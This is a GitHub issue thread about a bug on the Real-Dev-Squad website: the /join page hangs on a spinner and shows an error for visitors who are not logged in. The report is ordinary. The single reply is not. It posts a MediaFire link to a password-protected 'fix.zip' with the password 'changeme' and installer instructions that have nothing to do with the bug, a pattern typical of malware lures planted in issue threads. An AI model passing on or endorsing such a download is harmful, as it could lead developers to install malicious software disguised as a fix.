### ISSUE TITLE
Bug in /join page flow

### ISSUE THREAD

**Issue by shubhdevelop** [Real-Dev-Squad/website-www#924]
### Issue Description
when we visit /join page for the first time as someone who wants to join server, they need to fill up a form, though when they land they see nothing, the spinner keeps on buffering and users are notified with a error saying "some error has occurred

### Expected Behaviour
The page should show the step they need to follow in order to fill in the application to first time visitors

### Current Behaviour
The page is stuck with a spinner and an error message saying some error has occurred 

### Screenshots
![image](https://github.com/user-attachments/assets/88fcc26c-801e-414d-9c9c-ff567c35d95f)

### Reproducibility

 - [x] This issue is reproducible
 - [ ] This issue is not reproducible

### Steps to Reproduce
visit https://realdevsquad.com/join without logging in.

### Severity/Priority
 - [ ] Critical
 - [x] High
 - [ ] Medium
 - [ ] Low

### Checklist

- [x] I have read and followed the project's code of conduct.
- [x] I have searched for similar issues before creating this one.
- [x] I have provided all the necessary information to understand and reproduce the issue.
- [x] I am willing to contribute to the resolution of this issue.

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
